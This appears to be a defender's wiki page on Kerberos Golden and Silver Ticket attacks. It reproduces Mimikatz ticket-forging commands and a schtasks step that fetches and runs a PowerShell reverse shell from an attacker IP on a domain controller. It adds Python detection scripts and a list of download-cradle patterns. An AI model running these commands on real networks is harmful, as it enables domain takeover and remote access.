Defender's Notes
Golden/Silver Ticket


Last updated 4 years ago


Post taken from: Golden/Silver Ticket without Metasploit (https://medium.com/@mohnishdhage/how-to-get-a-reverse-shell-from-golden-silver-ticket-without-metasploit-52a9fc279e32)

Golden Ticket

A Golden Ticket is a persistence mechanism: a forged Ticket Granting Ticket (TGT) signed and encrypted with the NTLM hash of the krbtgt account. In simple words, a Golden Ticket is a valid TGT that can be used to obtain access to different services, and it lets us impersonate any user in the domain.

Once we have the NTLM hash of the krbtgt account, we can use the following Mimikatz command to create a Golden Ticket (this must be run as a local admin, because it writes into the LSASS process):

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:somedomainname.local /sid:S-1-5-21-1874506631-3219951593-538509811 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

kerberos::golden — Name of the Mimikatz Module

user — Name of the user for whom we are requesting the TGT (it doesn't need to be a valid name, as the DC does not validate the account until the TGT is older than 20 minutes)

domain — Name of the target domain

sid — Domain SID (you can use the command Get-DomainSID from PowerView to get this)

krbtgt — NTLM hash of the krbtgt account

id & groups — User RID and group RIDs (optional parameters)

ptt — Inject the ticket into the current PowerShell session (we can use /ticket instead to save the ticket for later use)

startoffset — When the ticket becomes valid, in minutes (0 = right now) (optional parameter)

endin — Lifetime of the ticket in minutes (optional parameter)

renewmax — Maximum ticket lifetime with renewal, in minutes (optional parameter)

To check if the ticket was created, we can use the following command:

klist

Silver Ticket

A Silver Ticket, on the other hand, is a valid Ticket Granting Service (TGS) ticket encrypted with the NTLM hash of a service account. A Silver Ticket can only be used to access the service whose NTLM hash it is encrypted with. The Silver Ticket attack is very quiet in terms of the logs left behind, but at the same time it provides limited access.

Once we have the NTLM hash of the target service account, we can use the following command to create a Silver Ticket:

Invoke-Mimikatz -Command '"kerberos::golden /domain:somedomainname.local /sid:S-1-5-21-1874506631-3219951593-538509811 /target:dc.somedomainname.local /service:HOST /rc4:731a06658bc10b59d71f5776e93e5689 /user:Administrator /ptt"'

The Mimikatz module used here is still kerberos::golden; there is no silver module.

service — the SPN (service class) of the service for which we are forging the TGS

rc4 — NTLM hash of the target service account

Note: We need a TGS for the HOST service in order to schedule a task on the target server (required to get a reverse shell from a Silver Ticket).
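Both tickets above are forged offline, which is also what gives a defender something to look for: a Golden Ticket is never requested from the DC, so the TGS requests made with it (event 4769) have no preceding TGT request (event 4768) from that client; a Silver Ticket never touches the DC at all, so the Kerberos logon it produces on the target host (event 4624) has no matching 4769 anywhere; and a ticket minted from an NTLM hash is RC4-encrypted (encryption type 0x17) in a domain that otherwise uses AES. The Python script below is an added example for this page, not code from the original post. It correlates constructed DC and host events with simplified field names; the account list, IPs and timestamps are made up for the example, and in a real multi-DC environment the 4768/4769 events must be collected from every DC before "no TGT issued" means anything. Resetting the krbtgt password twice (and rotating the relevant service account passwords) is the mitigation that invalidates already-forged tickets.

```python
"""Detection heuristics for forged Kerberos tickets (Golden and Silver).

Correlates Domain Controller events 4768 (TGT requested) and 4769 (TGS
requested) with host logon events 4624. Every event below is constructed for
this example and uses simplified field names, not the exact Security log
schema. Run stand-alone to print the findings."""
from collections import defaultdict
from datetime import datetime, timedelta

# Accounts that exist in the directory (constructed list).
KNOWN_ACCOUNTS = {"alice", "bob", "svc_sql", "administrator"}
# Ticket encryption types: 0x11/0x12 are AES128/AES256; 0x17 is RC4-HMAC,
# which is what a ticket minted from an NTLM hash uses.
AES_ETYPES = {"0x11", "0x12"}
# How far back we look for the DC-issued ticket that should precede a use.
WINDOW = timedelta(hours=10)        # AD default maximum TGT lifetime

# Constructed Domain Controller events.
DC_EVENTS = [
    {"id": 4768, "time": "2020-01-01T08:00:00", "account": "alice",
     "ip": "10.0.0.5", "etype": "0x12"},
    {"id": 4769, "time": "2020-01-01T08:05:00", "account": "alice",
     "ip": "10.0.0.5", "service": "cifs/fs01", "etype": "0x12"},
    # TGS requests from a client that never obtained a TGT from the DC,
    # one of them for an account that does not exist, both RC4-encrypted.
    {"id": 4769, "time": "2020-01-01T09:00:00", "account": "fakeadmin",
     "ip": "10.0.0.9", "service": "cifs/dc01", "etype": "0x17"},
    {"id": 4769, "time": "2020-01-01T09:10:00", "account": "administrator",
     "ip": "10.0.0.9", "service": "ldap/dc01", "etype": "0x17"},
]

# Constructed host events (network logons authenticated with Kerberos).
HOST_EVENTS = [
    {"id": 4624, "time": "2020-01-01T08:06:00", "host": "fs01",
     "account": "alice", "ip": "10.0.0.5", "package": "Kerberos"},
    # Kerberos logon to sql01 for which the DC never issued a service ticket.
    {"id": 4624, "time": "2020-01-01T10:00:00", "host": "sql01",
     "account": "administrator", "ip": "10.0.0.9", "package": "Kerberos"},
]


def _ts(s):
    return datetime.fromisoformat(s)


def _recent(issued_times, t):
    """True if any issued time lies in [t - WINDOW, t]."""
    return any(timedelta(0) <= t - issued <= WINDOW for issued in issued_times)


def golden_ticket_findings(dc_events, known_accounts=KNOWN_ACCOUNTS):
    """Flag 4769 TGS requests that look like they were made with a forged TGT."""
    tgt_times = defaultdict(list)       # (account, client ip) -> 4768 times
    for e in dc_events:
        if e["id"] == 4768:
            tgt_times[(e["account"].lower(), e["ip"])].append(_ts(e["time"]))
    findings = []
    for e in dc_events:
        if e["id"] != 4769:
            continue
        acct, t = e["account"].lower(), _ts(e["time"])
        reasons = []
        if acct not in known_accounts:
            reasons.append("account does not exist in the directory")
        if e["etype"] not in AES_ETYPES:
            reasons.append(f"ticket encryption type {e['etype']} is not AES")
        if not _recent(tgt_times[(acct, e["ip"])], t):
            reasons.append("no TGT (4768) issued to this client within the window")
        if reasons:
            findings.append({"time": e["time"], "account": e["account"],
                             "ip": e["ip"], "service": e["service"],
                             "reasons": reasons})
    return findings


def silver_ticket_findings(host_events, dc_events):
    """Flag Kerberos logons on a host with no matching 4769 on the DC."""
    tgs_times = defaultdict(list)       # (account, target host) -> 4769 times
    for e in dc_events:
        if e["id"] == 4769:
            host = e["service"].split("/", 1)[-1].lower()
            tgs_times[(e["account"].lower(), host)].append(_ts(e["time"]))
    findings = []
    for e in host_events:
        if e["id"] != 4624 or e["package"] != "Kerberos":
            continue
        key = (e["account"].lower(), e["host"].lower())
        if not _recent(tgs_times[key], _ts(e["time"])):
            findings.append({"time": e["time"], "host": e["host"],
                             "account": e["account"], "ip": e["ip"],
                             "reasons": ["Kerberos logon with no TGS (4769) issued by the DC for this host"]})
    return findings


if __name__ == "__main__":
    for f in golden_ticket_findings(DC_EVENTS) + silver_ticket_findings(HOST_EVENTS, DC_EVENTS):
        print(f)
```

On the constructed data the two RC4 requests from 10.0.0.9 are reported (the fakeadmin one with all three reasons) and the Kerberos logon to sql01 is reported as a Silver Ticket candidate, while alice's normal TGT, TGS and logon chain is silent. The "no 4768" and "no 4769" checks are the strongest signals; the RC4 check alone produces false positives in domains that still have legacy RC4 service accounts.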

Getting Reverse Shell

Step 1: Schedule a weekly task to fetch reverse shell script.

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "ABC" /TR "powershell.exe -c 'iex (iwr http://172.16.100.14/Invoke-PowerShellTcp.ps1 -UseBasicParsing)'"

Note: Make sure the script calls the function at the end and has the proper IP and port number configured (Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.14 -Port 1024), and that the file is actually hosted on the web server.

S — Name of the computer on which the task is to be scheduled

SC — Schedule type

RU — User used to create and execute the task

TN — Name of the task

TR — The command the task runs when it is triggered

Step 2: Start a listener

powercat -l -p 443 -v -t 1000

p — port to listen on

t — timeout

Step 3: Run the scheduled task.

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "User14"
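From the defender's side, the task created in Step 1 leaves a clear record: schtasks /create with /S registers the task on the remote machine, so the target writes Security event 4698 (a scheduled task was created), whose TaskContent field carries the full task XML, including the principal it runs as and the Exec command line. The Python script below is an added example, not part of the original post. It parses constructed 4698 events (the first mirrors the Step 1 task, the second is a stock Windows maintenance task that also runs as SYSTEM) and reports only tasks whose action looks like a download-and-execute cradle; the event fields and timestamps are made up for the example. Note that 4698 is only logged when the "Other Object Access Events" audit subcategory is enabled, which is worth checking before relying on this.

```python
"""Flag suspicious scheduled-task creations from Security event 4698.

A 4698 event carries the task's XML definition in its TaskContent field. This
script parses that XML and scores tasks whose action is a download-and-execute
command line. Events are constructed for this example."""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_PRINCIPALS = {"s-1-5-18", "nt authority\\system", "system"}
# Tokens typical of a PowerShell download cradle or encoded command.
CRADLE_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"\biwr\b", r"invoke-webrequest",
    r"downloadstring", r"downloadfile", r"https?://",
    r"-enc(odedcommand)?\b", r"frombase64string",
]

# Constructed 4698 events: the first mirrors the task from Step 1 above,
# the second is a stock Windows maintenance task that also runs as SYSTEM.
EVENTS_4698 = [
    {"time": "2020-01-01T09:20:00", "computer": "dcorp-dc", "subject": "administrator",
     "task": "\\ABC", "content": """
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-c 'iex (iwr http://172.16.100.14/Invoke-PowerShellTcp.ps1 -UseBasicParsing)'</Arguments>
  </Exec></Actions>
</Task>"""},
    {"time": "2020-01-01T09:30:00", "computer": "dcorp-dc", "subject": "SYSTEM",
     "task": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "content": """
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>%SystemRoot%\\system32\\defrag.exe</Command>
    <Arguments>-c -h -o -$</Arguments>
  </Exec></Actions>
</Task>"""},
]


def analyze_task(content):
    """Return the run-as principal, the Exec command lines and matched cradle patterns."""
    root = ET.fromstring(content.strip())
    user = (root.findtext("t:Principals/t:Principal/t:UserId", "", TASK_NS) or "").strip().lower()
    lines, hits = [], []
    for exe in root.findall("t:Actions/t:Exec", TASK_NS):
        cmd = (exe.findtext("t:Command", "", TASK_NS) or "").strip()
        args = (exe.findtext("t:Arguments", "", TASK_NS) or "").strip()
        line = f"{cmd} {args}".strip()
        lines.append(line)
        hits += [p for p in CRADLE_PATTERNS if p not in hits and re.search(p, line, re.I)]
    return {"runs_as_system": user in SYSTEM_PRINCIPALS, "command_lines": lines, "hits": hits}


def suspicious_tasks(events):
    """Score 4698 events; a task is reported only if its action matches a cradle pattern."""
    report = []
    for ev in events:
        info = analyze_task(ev["content"])
        if not info["hits"]:
            continue            # running as SYSTEM alone is normal for many built-in tasks
        reasons = [f"action matches {len(info['hits'])} download/execute pattern(s)"]
        if info["runs_as_system"]:
            reasons.append("task runs as SYSTEM")
        report.append({"time": ev["time"], "computer": ev["computer"], "task": ev["task"],
                       "created_by": ev["subject"], "command_lines": info["command_lines"],
                       "score": len(info["hits"]) + int(info["runs_as_system"]),
                       "reasons": reasons})
    return report


if __name__ == "__main__":
    for r in suspicious_tasks(EVENTS_4698):
        print(r)
```

On the constructed events only \ABC is reported (three cradle patterns plus SYSTEM, score 4); the defrag task runs as SYSTEM too but has no network or execution tokens in its action and stays silent. In practice this is paired with event 4702 (task updated) and 4699 (task deleted), since an attacker who removes the task afterwards still leaves the creation record behind.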

Reference:

Original post - https://medium.com/@mohnishdhage/how-to-get-a-reverse-shell-from-golden-silver-ticket-without-metasploit-52a9fc279e32

schtasks - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks